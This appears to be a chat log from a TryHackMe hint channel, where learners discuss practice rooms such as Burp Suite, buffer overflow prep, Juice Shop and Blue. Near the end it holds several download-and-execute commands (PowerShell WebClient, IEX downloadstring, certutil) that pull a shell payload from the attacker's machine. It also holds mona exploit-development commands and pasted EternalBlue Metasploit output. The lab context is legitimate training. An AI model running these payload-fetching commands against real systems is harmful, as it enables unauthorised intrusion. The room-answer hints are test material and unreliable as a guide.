hello everyone! im having an issue solving the Burp Suite room , to be more accurate im at Task10[q6] , i have analyzed the set-cookie header ... ive read all the summary page ... there is nothing in there , ive made a huge research online and found a youtube video where there is a russian guy fails at the same point (i dont speak russian i just watched what he did there (Video at 1:02 https://www.youtube.com/watch?v=ONVWzb7l5d8&t=3961s)
can any of you guys give me a better hint?

I have the same issue like @dire zinc. The password cracking challenges

It is true that we use the brute force method with dictionaries what I did but it can't decrypted

Are you sure you are checking the response, and not the request @true gazelle

yeah im at the response tab , i saw the "set-cookie" , then sent it to the sequencer , just like the guy did in the video , after reaching 10,000 i analayzed it and got nothing extraordenery

Can you show me which one you analyzed

this one
https://imgur.com/EwKtUhv.png

Hey I'm doing overflow prep OVERFLOW1 I'm at the finding bad char part I changed my payload according to the python script with my offset set to ||1978|| and retn set to BBBB but wehn I run my exploit.py I can't see ESP register in my log data but my debugger paused am I doing something wrong I'm fairly new to overflow so I might be doing something silly....I'm just following the walkthrough

Hey I'm doing overflow prep OVERFLOW1 I'm at the finding bad char part I changed my payload according to the python script with my offset set to ||1978|| and retn set to BBBB but wehn I run my exploit.py I can't see ESP register in my log data but my debugger paused am I doing something wrong I'm fairly new to overflow so I might be doing something silly....I'm just following the walkthrough

Do I need to set the offset back to 0 and retn to none as in the beginning? I tried that too but still couldn't find esp in the log data

hello everyone! im having an issue solving the Burp Suite room , to be more accurate im at Task10[q6] , i have analyzed the set-cookie header ... ive read all the summary page ... there is nothing in there , ive made a huge research online and found a youtube video where there is a russian guy fails at the same point (i dont speak russian i just watched what he did there (Video at 1:02 https://www.youtube.com/watch?v=ONVWzb7l5d8&t=3961s)
can any of you guys give me a better hint?
@true gazelle Anyone? please i need hints

guys

where is rockyou.txt file located pls tell i forgot

That sounds like a question to google first

oh...i wasn't connected with vpn...

wow

That doesn't affect where Rockyou is stored

but ok

what the hell

im stupid af

found it 😄 lmao

Hi everyone. Can someone help me with OWASP Juice Shop task 7 - question 2 I have gotten the XSS alert but the flag will not pop. Why?

@mighty plover check other tabs, windows aren't left open

@dense violet I checked but it didn’t work

Hello, working on room/OWASP-Juice-Shop. Am I missing something here? I think I should be getting a flag when logged in as the admin user and going to the/Administration page, not seeing squat, any thoughts? Task 6, Question 1

@true gazelle did you get sorted with your query regarding Burp?

@dense violet I checked but it didn’t work
@mighty plover i suggest terminate and reload box then, you may have missed it

I have gobusterd like 6 different large wordlists on main and sub directory on Lianyu and still can't find a 4 letter dir the room wants me to answer

Use dir 2.3 medium

Guess I just need to default to 2.3 medium

Snowball

Snowball
@warm nest Is there a question or do you just like snowballs?

Is snowball broken?

Not any more.

But it's no longer public

Oh ok, thats why i cant find it in hacktivities. Thanks!

Alright I found the ftp password for lianyu but no potential usernames and when I tried a vsftpd backdoor it said the server was set up anon only, so I try to use the name anonymous but it just gives 530 permission denied

https://puu.sh/Gt6wO/78d3f2febe.png

https://puu.sh/Gt6x3/316b251071.png

Then you need a password.

Anonymous perhaps?

capital A didnt work

Maybe it's not actually set up for Anonymous and it's lying to you?

Didn't know that was possible, but I guess I shouldn't be suprised

nmap can scan all ports at once right? I can't seem to find the command to do that anywhere

-p-

use rustscan

its faster

holy crap the ftp user was staring me right in the face

on OWASP top 10 how do i access the directorys for evilshell? i cant recall exactly how to do it and the only things i can find online is how to do it with actually owning the site

i’ve attempted exploring it via F12 on firefox and entered all commands

nvm after coming back i realized i never read anything correctly and the shell was actually the terminal

I stuck at Network Services 2, Task 8, question 4;
What is a common application of MySQL?
Anyone can give me a hint about that ?

how many characters?

8-8

there is space between each 8 char.

hello everyone! im having an issue solving the Burp Suite room , to be more accurate im at Task10[q6] , i have analyzed the set-cookie header ... ive read all the summary page ... there is nothing in there , ive made a huge research online and found a youtube video where there is a russian guy fails at the same point (i dont speak russian i just watched what he did there (Video at 1:02 https://www.youtube.com/watch?v=ONVWzb7l5d8&t=3961s)
can any of you guys give me a better hint?
@true gazelle Anyone? please i need hints

@grand kraken It's under the 'What runs mysql' section in task 8

XDD

I was struggling very hard with that question lul

ty @pine hazel

@true gazelle did you work it out? what question are you stuck on?

You can try googling for a writeup. there are several available for that machine

Hello

I wanted to know if you ask for the room owner to reset the room. Would you loose the points you gained after room completion.

You can try googling for a writeup. there are several available for that machine
@opal cobalt #room-hints are for people who don't want to look at a writeup. #room-help is for people who have looked at writeups and still don't understand something

I wanted to know if you ask for the room owner to reset the room. Would you loose the points you gained after room completion.
@strange bloom Yes I guess, cause if you don't you can accumulate unlimited points theoretically

Well the room owner would also be involved in scam of helping that particular user gaining points. Each time the owner has to reset it and user has to complete the room again to gain additional points.

You reset the room, you loose the progress along with the points. Simple

that is the simplest and best solution.

Also #general or #site-support

If I had added a room name would it relevant to this room 🙂

Thank you for your assistance.

If I had added a room name would it relevant to this room 🙂
@strange bloom Not really, since you are not stuck and don't really need a hint

oh I am in room-hints and not room-help

You question wasn't relevent to #room-help too

I'll need to better understand the rooms before I post. Will do better.

They're channels, not rooms. If you say room, that implies a room on TryHackMe. It's important to be as clear as possible.

I meant channels. Apologies

Task 2: Analyze the code```
I didn't understand which code the task is talking about?

is it the code from ||github?||

Yes

You don't have any other code to analyse.

||backdoor binary?||

That's not code.

That's a binary

And you don't have that binary

omg then go lang code?

I don't know anything about go

It reads like any curly brace language.

You don't need to know anything about Go

ya I could answer questions I guess

thanks

I was going to RE the backdoor

I mean you have the source

Literally 0 point

I stuck at Network Services 2, Task 8, question 4;
What is a common application of MySQL?
Anyone can give me a hint about that ?
@pine hazel @somber crag I've tried eveything I could but cannot find :/

Read back through the text

User your answer format

any hints on the last task of the vulnversity room please?

GTFOBins

gotcha, thanks

Can one ask for a small push in room snowball yet ?

isnt that room private 🤔

dunno i have access to the room 🙂

It is private

okay private like no hints then 😄 i guess

You can still DM me I guess 😕 @mild eagle

the provided hint is pointing to a 7-8 phrase while the answer format is 8-8
@pine hazel @somber crag I've tried eveything I could but cannot find :/
@grand kraken

Do you need help with it inbroker?

@Klokateer yes my adhd has kicked in with this one

the first word to the answer contains a -

The way to type it in, inside the room is pretty inconsistent.

@klokateer haha good one thanks

btw has the answer for 9.2 worked for you?

I am connecting from an eu-west my-machine and I get a 5 letter monitor word , not 7 as in the answer format

did multiple redeploys but still I get wrong message

You're getting a... what?

""Welcome to the ******* monitor."" as in the hint

Hey Guys. How can I face the encryption challenge at the end of task 2 in biohazard room? The one about decrypting all the crests

I am connecting from an eu-west my-machine and I get a 5 letter monitor word , not 7 as in the answer format
@white salmon Try it from a kali

not at all @sharp patio

not at all @sharp patio
@final mortar Ha, sorry, had to delete my post, for some reason your name changed and I thought I tagged the wrong person. lol

i had problems with that toom, was different on my mysql client
@frozen oasis indeed, since the my-machine didn't have the mysql client pre-installed it has a difference which package from the suggested you install

Command 'mysql' not found, but can be installed with:

apt install mysql-client-core-5.7
apt install mariadb-client-core-10.1

it's hardcoded in the cli client

strings /usr/bin/mysql | grep Welcome

(https://bugs.mysql.com/bug.php?id=78767#:~:text=Description%3A The current welcome message,connection id and copyright notice.)

Owasp juice shop, Last login XSS, the flag is not popping up! though the XSS alert is working fine... Help!

Hello, for Game ZOne room, i am trying to do privEsc with metasploit, and even though i set the correct username and password, i still get Authentication failed when runining the exploit. Any suggestions?

show options and screenshot of the error

[] Started reverse TCP handler on 10.9.38.xxx:4444
[] Attempting to login...
[-] Authentication failed
[*] Exploit completed, but no session was created.

Why do you have .xxx there or is that a place holder?

place holder

so basically the username and pass works when login on the website

After a quick search around, I believe the exploit is broken on metasploit so you will have to perform it manually :p

ahh..i was afraid of this :/ shoot. Oh well, i guess doing it manually it is better 😛

thanks

:)

After a quick search around, I believe the exploit is broken on metasploit so you will have to perform it manually :p
@trim haven wait what. Since when

Check all the write ups, it didn’t work when I did it either I just performed it manually

It worked for me 🤔

🤷‍♂️

https://tryhackme.com/room/cmess priv esc nudge? i'm www-data currently found a cronjob that would probably be used to escalate to root i think but stuck at the getting shell as user andre tried his cms credentials but can switch to him ....

You have www users shell right?

If yes ||then try doing manual enumeration like navigate to other folders, etc||.

ok thanks

hi, with what cipher i can decode the code in frontpage of Theseus ?

No hints for Theseus.

Room owner wants it to be a challenge.

I need help in the room "Network Services 2": Task 8 #4 (What is a common application of MySQL?). Can anyone help?

@true stirrup google can help

I gave up on that one ha ha

@heady anchor unfortunately not

in network services 2 task 8 question 4, i tried all the answers that i could but i got non of them right. imm not sure i even understand the question correctly...can anyone point me in the right direction? thanks.

oh aha, I just figured it out because someone gave a hint last night... there are 2 ways to say something, the room has 1 way, the answer is another way (if you search this room for that question, you might find the hint)

or if you google what you THINK the answer is, you can find another version of the answer

wut

hol up what

ohhhhh

now i get it

thanks!

Heys guys, hoping someone could help. room: ZTH: Web 2, Task 11. I've tried both dirbuster and wfuzz to look for a php file using big.txt, but i've only found 3 files, which don't seem to show any sign of command execution. Any hints? I've tried both of these patterns ||ip:82/FUZZ.php ip:82/api.php?cmd=FUZZ ip:82/api.php?FUZZ=ls||

@fluid field I have no subscriber anymore so i cant see the task, but if i remember right this is the last task isn't it?

If it is, read the task carefully, it doesnt tell you to find a php file

@woven mirage Yep correct, last question. Even fuzzing for non-php files using the ||big.txt|| that was hinted, I am not having much luck. Any further hints? Appreciate the help!

can you send a screenshot of the task description for me to remember what it asks for?

@woven mirage

The task is literally telling you what to do

read the flag.txt

@woven mirage Yep, understand that - the part I am having trouble with is finding the API that will allow me to send commands to be able to read flag.txt. I have tried all sorts of Fuzzing but I have had no luck. That's where I was hoping to get a hint, cheers! (maybe it is staring me in the face, I just don't know what else to try)

It is staring you in the face hahaha, well try to think of other ways to read files aside from executing commands in the machine

Forget the api for a while

imagine how is the filesystem and where could flag.txt be stored in this situation

@woven mirage hahahaha omg, that was staring me in the face, how did I spend so long on that. Cheers for the help!

Steel Mountain like its running http file server

what am i missing

Actual product name, rather than what you said

|| Rejetto HTTP File Server||

found it

can you help me find nmap scan all ports option guys?

So, I’m in PS Empire trying to get the listeners to start, but after setting my port to 80, I get “Listener startup on port 80 failed: already in use”. I’m assuming that my Kali machine that I am using through the website is currently using port 80 to provide me the Kali box. Anyway around this to finish the room?
I’ve also ran into this in another room, too. I just forget which one.

Set your port to a different port?

@trim haven That would seem obvious, but I’m not sure if I would get the same results since the instructions say to use 80. I’m assuming the target machine is using port 80.

The port you’re setting is for your own machine I believe

If it is already in use on their machine simply restarting it would fix it

Because the room tells you how to setup Empire

And if it told you to set the port as 80 and 80 did not work, that makes no sense

You see my logic? :)

I see your logic, and thank you. But, I ran into a similar issue with another room. I am using the Tryhackme.com provided browser based Kali machine. While investigating on the similar issue from another room, I found the process that was using port 80 on the Kali machine and I tried killing the process. Once I killed the process, I lost access to the Kali machine. Does that make sense? 😀

So, I need port 80 on the Kali running to actually give me access to the machine. Or, that is my thinking.

I mean

You can ssh into the machine

But I don’t think you should kill processes

Especially as the process you’re killing is the Webserver

And the Webserver is your main use

You can just change ports it literally doesn’t mean much other than a different port

If you really really want port 80 just create your own Vm 🤷‍♂️

I’ll try a different port and see what happens, thanks!!!

hi

@trim haven thanks for your help. Finished the room!!!

:p

in encryption 101 task 5 question 2, i am having trouble with that answer. i tried researching it a lot and rereading the page but couldnt find anything. can anyone point me in the right direction? thanks.

https://en.wikipedia.org/wiki/Data_Encryption_Standard#Replacement_algorithms

Thanks! @pine hazel. i got the answer.

shoulda read more of the wikipedia

No problem.

Can someone give me a hint on task3 question 7 in de ps empire room

okay thanks

Can I get any help on Vulnversity -> Compromise the webserver Q3, the aswer is obvious but I'm not getting the expected results in the Burp Suite

What are you expecting?

What are you getting?

Also it says Click on "Payloads" and select the "Sniper" attack type, but attack types for me are under the Positions Tab, probably different version

What are you expecting?
@stuck fractal With the list from the room, when I run a sniper attack, for each extension I get the Extension not allowed response

But one should be able to be uploaded

Ok, enable or disable payload encoding

Whatever it's on now, flip it

Thank you, got the success now

😄

hey i'm not able to get jump point in overflow3 i checked my badchars twice and got unmodified edited the bytearray with them but when i run the jump pt mona command it does not show the jmp pt in log window

room-overflow prep overflow3

@eternal brook try different addresses. The last 2 worked for me.

it says found 0 address...

If you meant by finding addresses for ||essfunc.dll||. I did it manually via|| !mona find -s "\xff\xe4" -m essfunc.dll||

this was my command ||!mona jmp -r esp -cpb "\x00\x11\x12\x40\x41\x5f\x60\xb8\xb9\xee\xef"||

ah. It looks like your badchars are not quite right

ok i'll check again then thanks:)

Np. Oddly though, addresses containing \x11 does not work for me. Might be the cause of bad char. So you might wanna try jmp esp gadgets without it to save some of your time!

ok so i removed the next char to every hex charthere i found 2 jump address really don't know how...

this worked and gave me 2 jmp address if someone could explain me how this happened?||!mona jmp -r esp -cpb "\x00\x11\x40\x5f\xb8\xee"||

Well mona found you the jmp esp addresses without the bad chars u stated

Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even effect the rest of the string. {mentioned in the task writeup} is this the reason?

Not quite. That is if you were to be testing for bad characters manually and spot two bad chars, you would want to remove the first bad char as it maybe what is causing the second bad char to appear.

So i guess its always recommended to only remove the first bad char you see, and then perform the check again.

yea i think that worked the second time when i removed the next bad char i found...

thanks for your help:)

Sometimes , if you use scripts to find bad char, there may be error.

Doing it manually is better for me

ah i've just started learning buffer overflows i'll try doing manually once i get familiar with the process:)

@eternal brook Reading your question again, you are right. The script (possibly mona?) you are using to find bad chars might be removing all bad chars in 1 search iteration instead of the first one. Good luck!

Can someone give a hint on "Blue" room, I'm trying to exploit the maschine with ms17_010_eternalblue but no success

[*] 10.10.220.237:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 10.10.220.237:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 10.10.220.237:445 - Scanned 1 of 1 hosts (100% complete) [*] 10.10.220.237:445 - Connecting to target for exploitation. [+] 10.10.220.237:445 - Connection established for exploitation. [+] 10.10.220.237:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.10.220.237:445 - CORE raw buffer dump (42 bytes) [*] 10.10.220.237:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 10.10.220.237:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 10.10.220.237:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 10.10.220.237:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.10.220.237:445 - Trying exploit with 12 Groom Allocations. [*] 10.10.220.237:445 - Sending all but last fragment of exploit packet [*] 10.10.220.237:445 - Starting non-paged pool grooming [+] 10.10.220.237:445 - Sending SMBv2 buffers [+] 10.10.220.237:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.10.220.237:445 - Sending final SMBv2 buffers. [*] 10.10.220.237:445 - Sending last fragment of exploit packet! [*] 10.10.220.237:445 - Receiving response from exploit packet [-] 10.10.220.237:445 - Did not receive a response from exploit packet [*] 10.10.220.237:445 - Sending egg to corrupted connection. [-] 10.10.220.237:445 - Errno::ECONNRESET: Connection reset by peer [*] Exploit completed, but no session was created.

Here is the msf output

Metasploit 6 is broken

You need metasploit 5

Thank you, I will try that

Any reasons why?

Metasploit 6 is unstable

Rapid7 asked Kali and Parrot to not ship it

Parrot shipped it.

Thanks for the explanation

@eternal brook Reading your question again, you are right. The script (possibly mona?) you are using to find bad chars might be removing all bad chars in 1 search iteration instead of the first one. Good luck!
@orchid fossil yes I'm using mona and as far as I understood it .......it does remove all bad chars in one go we just need to rerun that script to confirm that all bad chars are pointed out.....I think it's just that the script (mona) points more bad chars than actual bad chars so we just need to remove one char out of consecutive ones
That's why I think my second command worked
Thanks for your help:)

@pearl ridge - try other exploits like exploit/windows/smb/ms17_010_psexec

I tried msf5, exploit is fine, the next step is to convert a shell to meterpreter shell but msf5 fail on that

output
[*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 10.10.49.173:4433 [-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: The system cannot find the file specified. [-] Call stack: [-] /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:173:in execute'
[-] /usr/share/metasploit-framework/lib/msf/core/post/common.rb:114:in cmd_exec' [-] /usr/share/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:164:in run'
[*] Post module execution completed
`

I'm now using the Kali linux from tryhackme

@pearl ridge - try other exploits like exploit/windows/smb/ms17_010_psexec
@viscid robin not helping ```[] Started reverse TCP handler on 192.168.1.6:4433
[] 10.10.220.237:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[-] 10.10.220.237:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.

boilerctf2 The interesting file name in the folder? pls hint

so many rabbit holes

its hurting my head

You already had a meterpreter I'm guessing? @pearl ridge

@stuck fractal No, I did not

What type of shell did you have before?

powershell -c “(New-Object System.Net.WebClient).DownloadFile('http://MYIP:8000/shell.exe', ‘C:\Windows\Temp\shell.exe’)"

Why is this not working for me? I've got a http server running, but it's not doing anything.

Edit: I've also tried: powershell -c “Invoke-WebRequest -Uri ‘http://IP:8000/shell.exe’ -OutFile ‘C:\Windows\Temp\shell.exe'"

IEX

Nothing in output?

Nup.

It's not even grabbing the file.

did you try IEX

I have not yet, I will try right now, sorry I was answering @night cave

iex (new-object net.webclient).downloadstring('http://ip:port/shell.txt')

ok

or just use certutil

that's gonna be a google from me.

are you trying to download a file

upload.

certutil.exe --urlcache -split -f

and then your ip address

hm, nothing happened.

it's for HackPark.

I dont know what that is - ive never done a room in my life lol

I see.

Can someone help me with the LFI room
I found the ssh key but the ssh agent says it is the wrong format
what did I do wrong

@dusk imp there are 66368532 ways to download a file. You just gotta keep trying different ones until one works 🙂

ohai blob